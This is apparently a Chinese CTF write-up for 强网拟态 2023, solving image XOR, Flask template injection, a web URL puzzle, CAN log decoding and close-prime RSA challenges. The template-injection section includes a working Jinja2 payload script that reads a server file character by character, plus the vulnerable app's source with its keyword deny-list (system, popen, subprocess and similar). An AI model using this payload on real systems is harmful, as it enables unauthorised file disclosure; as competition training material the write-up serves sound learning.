强网拟态2023 部分wp
jerem1ah Lv4

[强网拟态 2023] 国际象棋与二维码

生成一个 49×49 格的国际象棋棋盘,与原图像逐像素异或。为了让两张图尺寸一致,这里把原图在每个方向上放大 49 倍,把 49×49 的棋盘在每个方向上放大 500 倍,然后再异或。

from PIL import Image
import numpy as np

# Build a 49x49 checkerboard mask: a cell is 255 when (row + column) is odd,
# 0 otherwise, replicated over the three RGB channels.
rows, cols = np.indices((49, 49))
cell = (((rows + cols) % 2) * 255).astype(np.uint8)
img1 = np.stack([cell, cell, cell], axis=-1)

# Enlarge every checkerboard cell to 500x500 pixels.
# Each full-size array is 24500 x 24500 x 3 bytes (about 1.8 GB), so this
# script needs several GB of RAM.
img1 = np.repeat(img1, 500, axis=1)
img1 = np.repeat(img1, 500, axis=0)
# Optional debugging aid: Image.fromarray(img1).save("res1.png")

# Enlarge every pixel of the challenge image 49 times in both directions.
# The XOR below only works if both arrays end up with the same shape, i.e.
# attach.png is presumably 500x500 pixels - confirm against the attachment.
img2 = np.array(Image.open("attach.png").convert("RGB"))
img2 = np.repeat(img2, 49, axis=1)
img2 = np.repeat(img2, 49, axis=0)
# Optional debugging aid: Image.fromarray(img2).save("res2.png")

# Pixel-wise XOR with the mask strips the checkerboard overlay.
img3 = np.bitwise_xor(img1, img2)
Image.fromarray(img3).save("res3.png")

image-20231111232528976

[强网拟态 2023] 用户登记系统

exp.py

import requests
# Form handler of the challenge instance.
url = 'http://116.63.134.105/index.php'

# Template expression sent in the "name" field, split around the character
# index. The handler formats the submitted name into the template source
# before rendering it, so the expression is evaluated on the server.
EXPR_HEAD = '{{c.__init__.__globals__.__builtins__.open("".join(c.__init__.__globals__["__builtins__"].reversed("galf/pmt/"))).read()['
EXPR_TAIL = ']}}'

# One request per character index. The rendered page starts with a fixed
# 8-character greeting ("<h1>您好, "), so offset 8 of the body is the single
# character the expression produced.
# Server side this shows up as up to 1000 consecutive POSTs to /index.php
# whose "name" value contains template delimiters - an easy pattern to
# alert on in access or WAF logs.
for i in range(1000):
    payload = {'name': EXPR_HEAD + str(i) + EXPR_TAIL}
    page = requests.post(url, data=payload).text
    print(page[8], end='')

'''
flag{u_win_have_fun}
'''

附上读出来的源码,&符号应该为引号

import random
from flask import Flask, request, render_template_string, abort, redirect
import string

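# NOTE: the dumped source showed quote characters as '&'; they are restored
# here. The character between '.' and '[' in the allow-list is taken to be a
# double quote (inferred: the working request on this page contains one).

# Per-character allow-list for the submitted name. It still admits every
# character a Jinja2 expression needs ({ } ( ) . _ [ ] and the double quote),
# so on its own it does not keep template syntax out of the input.
white_list = string.ascii_letters + string.digits + '()_-{}."[]=/'
#mimic-defense-31919-heterogeneous
#mimic-defense-29414-heterogeneous

# Substring deny-list matched against the raw input only. It never sees what
# the template evaluates to, so it is a speed bump rather than a control;
# the real fix is to stop rendering user input as template source.
black_list = ["codecs", "system", "for", "if",
              "end", "os", "eval", "request", "write",
              "mro", "compile", "execfile", "exec",
              "subprocess", "importlib", "platform", "timeit",
              "import", "linecache", "module", "getattribute",
              "pop", "getitem", "decode", "popen",
              "ifconfig", "flag", "config", "cat"]

app = Flask(__name__)
#mimic-defense-94180-heterogeneous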


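@app.after_request
def modify_headers(response):
    """Set X-Powered-By to a randomly chosen PHP version banner.

    The application is a Flask app, so the PHP banner (like the /index.php
    route name) is a decoy; it does not change how input is processed.
    Quote characters, shown as '&' in the dump, are restored here.
    """
    random_str = ["PHP/7.3.33", "PHP/7.4", "PHP/7.2", "PHP/8.2"]
    response.headers["X-Powered-By"] = random.choice(random_str)
    return response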


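def check(s):
    """Abort the request with HTTP 500 if *s* fails the input filters.

    Three checks run in order: a length limit, the per-character allow-list
    (white_list) and the substring deny-list (black_list). Returns None when
    all of them pass.

    The dump showed quotes and the comparison operator as '&'; the quotes are
    restored, and the comparison is taken to be '>' (inferred: a length
    filter that rejects long input).
    """
    #mimic-defense-86550-heterogeneous
    # print(len(s))
    # if len(s) > 131:
    if len(s) > 478:
        abort(500, "u are hacker")
        # abort(500, "hacker len")
    for ch in s:
        if ch not in white_list:
            abort(500, "u are hacker")
            # abort(500, "hacker white")
    # Matches literal substrings of the submitted text only.
    for word in black_list:
        if word in s:
            abort(500, "u are hacker")
            # abort(500, "hacker black")
    #mimic-defense-26568-heterogeneous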


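@app.route("/")
def redirectIndex():
    """Redirect the site root to /index.php with a 302.

    Quote characters, shown as '&' in the dump, are restored here.
    """
    return redirect("/index.php", 302)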


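@app.route("/index.php", methods=["GET", "POST"])
def hello_world():
    """Serve the registration form (GET) and the greeting page (POST).

    The dump showed quotes and angle brackets as '&'; they are restored here
    from context, and the original indentation inside the form template is
    not recoverable.
    """
    #mimic-defense-7691-heterogeneous
    #mimic-defense-50975-heterogeneous
    # Constant template: here {{ name }} would be a context variable, which
    # is the safe way to show user input.
    template = '''
<h1>用户登记系统</h1>
<form method="POST">
<label for="name">输入用户名称:</label>
<input type="text" id="name" name="name">
<input type="submit" value="Submit">
</form>

{% if name %}
<p>您好, {{ name }} 已登记!</p>
{% endif %}
'''
    if request.method == "POST":
        try:
            print(request.form)
            # NOTE(review): .get() returns None for a missing field instead
            # of raising, so the except branch is not expected to run in
            # that case and None reaches check() - confirm intended.
            name = request.form.get("name")
        except Exception:
            return render_template_string("<h1>需要name参数<h1>")

        if name == "":
            #mimic-defense-81766-heterogeneous
            return render_template_string("<h1>请输入用户名!<h1>")

        check(name)
        # SSTI sink: the user-controlled name is formatted into the template
        # SOURCE, so Jinja2 evaluates any expression it contains. The fix is
        # to keep the template constant and pass the value as context, e.g.
        # render_template_string("<h1>您好, {{ name }}已登记!!<h1>", name=name),
        # which also HTML-escapes it.
        template = "<h1>您好, {}已登记!!<h1>".format(name)
        res = render_template_string(template)
        # Output filter: only rejects responses containing this literal
        # substring; it is not a substitute for fixing the sink above.
        if "flag" in res:
            #mimic-defense-31218-heterogeneous
            abort(500, "u are hacker")
        #mimic-defense-55651-heterogeneous
        return res
    return render_template_string(template)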


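# Quote characters, shown as '&' in the dump, are restored here.
if __name__ == "__main__":
    # debug=True turns on the Werkzeug interactive debugger and verbose
    # tracebacks, and host "0.0.0.0" listens on every interface; that
    # combination must not be used for a service reachable by others.
    app.run(host="0.0.0.0", debug=True)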

[强网拟态 2023] find me and crack me

上一届原题

https://www.cmd5.com/

https://www.mklab.cn/utils/des

image-20231111233153499

image-20231111233209068

1.maybe used first url get random:
/mimic_storage

2.maybe used second url get flag:
/getflag?sec=random&path=xxxx

xxx is:
MVhuOtClaoE5899iOuiSWkvqxsrRimmb
http://web-e5face3ce6.challenge.xctf.org.cn/getflag?sec=1851183404&path=MVhuOtClaoE5899iOuiSWkvqxsrRimmb
'''
flag{bWltaWMtQ3RmLVd1SmlhbmdYaW5n}
'''

image-20231111233316887

[强网拟态 2023] Tbox can

import pandas as pd

# Load the captured CAN log; only its "data" column is used.
df = pd.read_csv("./can_data.csv")

# Values written as hex literals ("0x..") are treated as character codes and
# printed back to back; every other value in the column is skipped.
for raw in df['data']:
    text = str(raw)
    if text.startswith('0x'):
        print(chr(int(text, 16)), end='')

'''
flag{L0QGIC_ANAR1YSIS_CSAN_FOR_TFUN}
'''

[强网拟态 2023] 一眼看出

https://blog.csdn.net/hacker_zrq/article/details/121444869 //费马分解

from Crypto.Util.number import *
from secret import flag
import gmpy2
# Fixed anchor value that both primes are derived from.
a = 11001240791308496565411773845509754352597481464288272699325231395472137144610774645372812149675141360600469640492874223541765389441131365669731006263464699
# Small random offset: a 6-bit prime.
r = getPrime(6)
# Rebinds the imported flag to an empty value in this published listing.
flag = b''

# Weakness: both primes sit within a tiny window around `a` (next primes
# after a - r and after next_prime(a) + r), so p and q are almost equal and
# n = p * q can be factored with Fermat's method. Sound key generation draws
# p and q independently at random; FIPS 186-4 additionally requires
# |p - q| > 2^(nlen/2 - 100).
q = gmpy2.next_prime(gmpy2.next_prime(a) + r)
p = gmpy2.next_prime(a - r)
n = p * q
def enc(flag, n):
    """Return the textbook RSA encryption of *flag* under modulus *n*.

    The bytes are converted to an integer and raised to the public exponent
    65537 modulo n; no padding scheme is applied.
    """
    public_exponent = 65537
    message_int = bytes_to_long(flag)
    return pow(message_int, public_exponent, n)
# Encrypt the flag under the modulus built above.
c = enc(flag, n)
# Print the public values handed to the solver: modulus and ciphertext.
print('n =', n)
print('c =', c)
# Recorded output of the challenge author's run. The tuple form and the
# mpz(...L) suffix suggest it was produced under Python 2 - presumably with
# the real flag rather than the empty value set in this listing.
# ('n =', mpz(121027298948349995679677982412648544403333177260975245569073983061538581058440163574922807151182889153495253964764966037308461724272151584478723275142858008261257709817963330011376266261119767294949088397671360123321149414700981035517299807126625758046100840667081332434968770862731073693976604061597575813313L))
# ('c =', mpz(42256117129723577554705402387775886393426604555611637074394963219097781224776058009003521565944180241032100329456702310737369381890041336312084091995865560402681403775751012856436207938771611177592600423563671217656908392901713661029126149486651409531213711103407037959788587839729511719756709763927616470267L))
import gmpy2
from Crypto.Util.number import *
# Public modulus and ciphertext from the challenge output.
n = 121027298948349995679677982412648544403333177260975245569073983061538581058440163574922807151182889153495253964764966037308461724272151584478723275142858008261257709817963330011376266261119767294949088397671360123321149414700981035517299807126625758046100840667081332434968770862731073693976604061597575813313
c = 42256117129723577554705402387775886393426604555611637074394963219097781224776058009003521565944180241032100329456702310737369381890041336312084091995865560402681403775751012856436207938771611177592600423563671217656908392901713661029126149486651409531213711103407037959788587839729511719756709763927616470267

# Fermat factorisation: search upward from floor(sqrt(n)) for an `a` such
# that a^2 - n is a perfect square b^2; then n = (a - b) * (a + b).
# The search ends after few steps only because the two primes were generated
# next to each other; with independently chosen primes it is infeasible.
a = gmpy2.isqrt(n)
while True:
    print(a)
    b1 = a * a - n
    if gmpy2.is_square(b1):
        break
    a += 1
b = gmpy2.isqrt(b1)
p = a - b
q = a + b

# With the factors known, derive the private exponent and decrypt.
e = 65537
phi = (p - 1) * (q - 1)
d = gmpy2.invert(e, phi)
plaintext = long_to_bytes(pow(c, d, n))
print(plaintext)
'''
b'flag{621f7c4f-21de-8566-649e-5a883ce318dc}'
'''